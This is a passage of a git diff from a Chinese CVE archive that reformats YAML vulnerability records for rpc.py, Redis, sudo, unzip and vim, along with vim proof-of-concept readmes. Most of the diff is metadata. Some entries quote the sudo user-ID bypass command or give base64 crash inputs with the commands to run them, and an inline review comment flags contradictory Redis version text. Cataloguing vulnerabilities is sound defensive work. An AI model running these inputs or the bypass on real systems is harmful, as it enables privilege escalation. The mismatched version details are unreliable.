Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。 + severity: critical + description: + rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. 
+ scope-of-influence: + rpc.py v0.4.2 - v0.6.0 + reference: + - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html + - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd + - https://github.com/ehtec/rpcpy-exploit + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-35411 + cwe-id: None + cnvd-id: None + kve-id: None + tags: + - 远程代码执行 diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml index 7b5dcafb09241e93300148bc8eebd76245c3bdd1..7b0a82da0ac339715ad1bd485bfca15c0a9df2a6 100644 --- a/cve/redis/2022/yaml/CVE-2022-31144.yaml +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml 
@@ -1,24 +1,24 @@ -id: CVE-2022-31144 -source: - https://github.com/SpiralBL0CK/CVE-2022-31144 -info: - name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. - severity: High - description: | - Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布. - scope-of-influence: - 7.0 <= redis < 7.0.4 - reference: - - https://github.com/redis/redis/releases/tag/7.0.4 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31144 - - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh - - https://security.gentoo.org/glsa/202209-17 - - https://security.netapp.com/advisory/ntap-20220909-0002/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-31144 - cwe-id: CWE-787, CWE-122 - cnvd-id: None - kve-id: None +id: CVE-2022-31144 +source: + https://github.com/SpiralBL0CK/CVE-2022-31144 +info: + name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. + severity: High + description: | + Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布. + scope-of-influence: + 7.0 <= redis < 7.0.4 + reference: + - https://github.com/redis/redis/releases/tag/7.0.4 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31144 + - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh + - https://security.gentoo.org/glsa/202209-17 + - https://security.netapp.com/advisory/ntap-20220909-0002/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-31144 + cwe-id: CWE-787, CWE-122 + cnvd-id: None + kve-id: None tags: 堆溢出, 远程代码执行 \ No newline at end of file diff --git a/cve/sudo/2019/CVE-2019-18634/.gitignore b/cve/sudo/2019/CVE-2019-18634/.gitignore old mode 100755 new mode 100644 diff --git a/cve/sudo/2019/CVE-2019-18634/LICENSE b/cve/sudo/2019/CVE-2019-18634/LICENSE old mode 100755 new mode 100644 
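Review bot: The description re-added on the new side disagrees with the file's own version data: it says `此问题会影响 7.7.0 之前的 4.x 分支上的版本`, while `scope-of-influence` gives `7.0 <= redis < 7.0.4` and `reference` links the 7.0.4 release, so anyone reading or parsing the prose gets a branch (`4.x`) and a version (`7.7.0`) that nothing else in the record supports. The sentence should follow the scope line: `此问题会影响 7.0.4 之前的 7.x 分支上的版本. 该修补程序在版本 7.0.4 中发布.`. This hunk appears to re-add all 24 lines unchanged (presumably a line-ending normalization), so the inconsistency is inherited rather than introduced, but the rewrite is the natural place to correct it.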
diff --git a/cve/sudo/2019/CVE-2019-18634/Makefile b/cve/sudo/2019/CVE-2019-18634/Makefile
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/README.md b/cve/sudo/2019/CVE-2019-18634/README.md
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/exploit.c b/cve/sudo/2019/CVE-2019-18634/exploit.c
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/yaml/CVE-2019-14287.yaml b/cve/sudo/2019/yaml/CVE-2019-14287.yaml
index 3abae8b78de02523d3e7ce6cbd42ca936e2aeb6a..9eee215b4a414a3636f4028d32be557bcb8fa60e 100644
--- a/cve/sudo/2019/yaml/CVE-2019-14287.yaml
+++ b/cve/sudo/2019/yaml/CVE-2019-14287.yaml
@@ -1,20 +1,20 @@
-id: CVE-2019-14287
-source: https://github.com/n0w4n/CVE-2019-14287
-info:
- name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。
- severity: high
- description: |
- 在1.8.28之前的Sudo中,访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块,并使用精心设计的用户ID调用Sudo,从而导致错误的日志记录。例如,对于"sudo -u \#$((0xffffffff))"命令,这允许绕过!root和USER=logging。
- scope-of-influence:
- sudo < 1.8.28
- reference:
- - https://access.redhat.com/security/cve/cve-2019-14287
- - https://nvd.nist.gov/vuln/detail/CVE-2019-14287
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2019-14287
- cwe-id: CWE-755
- cnvd-id: None
- kve-id: None
- tags: CVE-2019-14287, sudo
+id: CVE-2019-14287
+source: https://github.com/n0w4n/CVE-2019-14287
+info:
+ name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。
+ severity: high
+ description: |
+ 在1.8.28之前的Sudo中,访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块,并使用精心设计的用户ID调用Sudo,从而导致错误的日志记录。例如,对于"sudo -u \#$((0xffffffff))"命令,这允许绕过!root和USER=logging。
+ scope-of-influence:
+ sudo < 1.8.28
+ reference:
+ - https://access.redhat.com/security/cve/cve-2019-14287
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-14287
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-14287
+ cwe-id: CWE-755
+ cnvd-id: None
+ kve-id: None
+ tags: CVE-2019-14287, sudo
diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml
index 8fad732065c69fbaf8d90d4aa442ae726ecbd7c2..044f24e4acfd257ff5e927c14685b083e3a7626b 100644
--- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml
+++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml
@@ -1,20 +1,20 @@ -id: CVE-2023-22809 -source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc -info: - name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - severity: high - description: - Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - scope-of-influence: - sudo@[1.8.0, 1.9.12p2) - references: - - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-22809 - cwe-id: CWE-269 - cnvd-id: None - kve-id: None - tags: +id: CVE-2023-22809 +source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc +info: + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + scope-of-influence: + sudo@[1.8.0, 1.9.12p2) + references: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: - 特权管理不当 \ No newline at end of file diff --git a/cve/unzip/2022/yaml/CVE-2022-0529.yaml b/cve/unzip/2022/yaml/CVE-2022-0529.yaml index 7838180fd3dfd2778f7151668565783599f8887d..c24d3bacaf5eb5526ad5dc288da37390d4420bee 100644 --- a/cve/unzip/2022/yaml/CVE-2022-0529.yaml +++ b/cve/unzip/2022/yaml/CVE-2022-0529.yaml 
@@ -1,19 +1,19 @@ -id: CVE-2022-0529 -source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529 -info: - name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。 - severity: MEDIUM - description: - A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. - scope-of-influence: - unzip Up to (excluding) 6.0-r11 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-0529 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 5.5 - cve-id: CVE-2022-0529 - cwe-id: CWE-787 - cnvd-id: None - kve-id: None +id: CVE-2022-0529 +source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529 +info: + name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。 + severity: MEDIUM + description: + A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. + scope-of-influence: + unzip Up to (excluding) 6.0-r11 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0529 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2022-0529 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None tags: CVE-2022, unzip \ No newline at end of file diff --git a/cve/vim/2021/CVE-2021-3778/other_poc.txt b/cve/vim/2021/CVE-2021-3778/other_poc.txt index a0d7e45370a486e9acddfa006ee980ee945552d2..c86353be057e7d3106508ea5c4293d9a99055de1 100644 --- a/cve/vim/2021/CVE-2021-3778/other_poc.txt +++ b/cve/vim/2021/CVE-2021-3778/other_poc.txt 
@@ -1,6 +1,6 @@ -1. -echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt -vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa! -2. -echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt +1. +echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt +vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa! +2. +echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt vim -u NONE -X -Z -e -s -S fuzz000.txt -c :qa! \ No newline at end of file diff --git a/cve/vim/2021/CVE-2021-3778/readme.md b/cve/vim/2021/CVE-2021-3778/readme.md index fa732e1b2f668cc07a6998f1708ad7c45b772b0b..3f0cee118c339caf624b69e8c2ceaedf0b42de48 100644 --- a/cve/vim/2021/CVE-2021-3778/readme.md +++ b/cve/vim/2021/CVE-2021-3778/readme.md 
@@ -1,11 +1,11 @@ -Exact steps we followed to find this bug: - -1 -- git clone https://github.com/vim/vim - -2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none - -3 -- make - -4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt - +Exact steps we followed to find this bug: + +1 -- git clone https://github.com/vim/vim + +2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none + +3 -- make + +4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt + 5 -- vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa! \ No newline at end of file diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml index a009ea6b6928d8ffc4d92ad40c52ee8e141c520a..d847d833e333770d7024835c8bca83fb89d9a0af 100644 --- a/cve/vim/2021/yaml/CVE-2021-3778.yaml +++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml 
@@ -1,22 +1,22 @@ -id: CVE-2021-3778 -source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ -info: - name: vim: Heap-based Buffer Overflow in ex_retab() - severity: - HIGH - description: | - vim容易受到基于堆的缓冲区溢出的攻击 - scope-of-influence: - vim = 8.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-3778 - - https://www.openwall.com/lists/oss-security/2021/10/01/1 - - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2021-3778 - cwe-id: CWE-787, CWE-122 - cnvd-id: None - kve-id: None +id: CVE-2021-3778 +source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ +info: + name: vim: Heap-based Buffer Overflow in ex_retab() + severity: + HIGH + description: | + vim容易受到基于堆的缓冲区溢出的攻击 + scope-of-influence: + vim = 8.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3778 + - https://www.openwall.com/lists/oss-security/2021/10/01/1 + - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-3778 + cwe-id: CWE-787, CWE-122 + cnvd-id: None + kve-id: None tags: 堆缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md index 5ad3db9d77d49e6873c94394a59e830af7ef112c..c7b581825a05d748990dbf2931162f5f53e39c61 100644 --- a/cve/vim/2023/CVE-2023-0288/readme.md +++ b/cve/vim/2023/CVE-2023-0288/readme.md 
@@ -1,101 +1,101 @@ -#### 描述 - -memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出 - -#### 影响版本 - -``` -git log -commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD) -``` - -#### Proof of Concept - -``` -./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa! -================================================================= -==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8 -READ of size 2147479553 at 0x621000009d00 thread T0 - #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e) - #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6 - #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9 - #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2 - #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12 - #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7 - #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6 - #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5 - #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2 - #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2 - #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5 - #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6 - #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5 - #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6 - #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 - #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 - #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5 - #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12 - #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14 - #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2 - #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 - #21 0x7f2ae5 in do_cmdline 
/home/fuzz/vim/src/ex_docmd.c:993:17 - #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12 - #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2 - #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2 - #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 - #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 - #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad) - -0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00) -allocated by thread T0 here: - #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d) - #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11 - #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12 - #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21 - #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26 - #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15 - #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15 - #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9 - #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9 - #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5 - #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 - #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 - -SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove -Shadow bytes around the buggy address: - 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93c0: fa fa fa fa 
fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa -Shadow byte legend (one shadow byte represents 8 application bytes): - Addressable: 00 - Partially addressable: 01 02 03 04 05 06 07 - Heap left redzone: fa - Freed heap region: fd - Stack left redzone: f1 - Stack mid redzone: f2 - Stack right redzone: f3 - Stack after return: f5 - Stack use after scope: f8 - Global redzone: f9 - Global init order: f6 - Poisoned by user: f7 - Container overflow: fc - Array cookie: ac - Intra object redzone: bb - ASan internal: fe - Left alloca redzone: ca - Right alloca redzone: cb - Shadow gap: cc -==11458==ABORTING -``` - -#### 影响 - +#### 描述 + +memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出 + +#### 影响版本 + +``` +git log +commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD) +``` + +#### Proof of Concept + +``` +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa! 
+================================================================= +==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8 +READ of size 2147479553 at 0x621000009d00 thread T0 + #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e) + #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6 + #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9 + #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2 + #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12 + #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7 + #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6 + #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5 + #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2 + #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2 + #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5 + #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6 + #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5 + #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6 + #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 + #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5 + #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12 + #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14 + #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2 + #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 + #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12 + #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2 + #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2 + #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #26 0x7f8319ce2082 in __libc_start_main 
/build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad) + +0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00) +allocated by thread T0 here: + #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d) + #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11 + #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12 + #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21 + #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26 + #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15 + #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15 + #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9 + #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9 + #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5 + #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove +Shadow bytes around the buggy address: + 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + 
Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==11458==ABORTING +``` + +#### 影响 + 这个漏洞能够使软件崩溃,修改内存,并可能造成远程执行。 \ No newline at end of file diff --git "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" index efca437fed854baad8099a88d9efb79bf7879939..303532003b7b71a2b677699078a02e798be7aecc 100644 --- "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" +++ "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" 
